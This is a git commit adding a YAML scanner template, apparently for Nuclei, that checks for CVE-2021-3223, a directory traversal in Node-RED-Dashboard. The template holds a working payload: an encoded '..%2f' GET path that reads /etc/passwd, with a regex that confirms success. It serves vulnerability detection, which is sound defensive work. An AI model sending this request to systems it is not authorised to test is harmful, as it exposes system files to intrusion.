Create CVE-2021-3223.yaml

Node-RED-Dashboard before 2.26.2 allows ui_base/js/..%2f directory traversal to read files.

Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com>
patch-1
GwanYeong Kim 2021-06-24 21:07:17 +09:00
parent 2f1aa7e102
commit e7bb4bff23
1 changed files with 22 additions and 0 deletions

View File

@ -0,0 +1,22 @@
id: CVE-2021-3223
info:
name: Node RED Dashboard - Directory Traversal
author: gy741
severity: high
description: Node-RED-Dashboard before 2.26.2 allows ui_base/js/..%2f directory traversal to read files.
reference: |
- https://github.com/node-red/node-red-dashboard/issues/669
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3223
tags: cve,cve2020,node-red-dashboard,lfi
requests:
- method: GET
path:
- '{{BaseURL}}/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd'
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0:"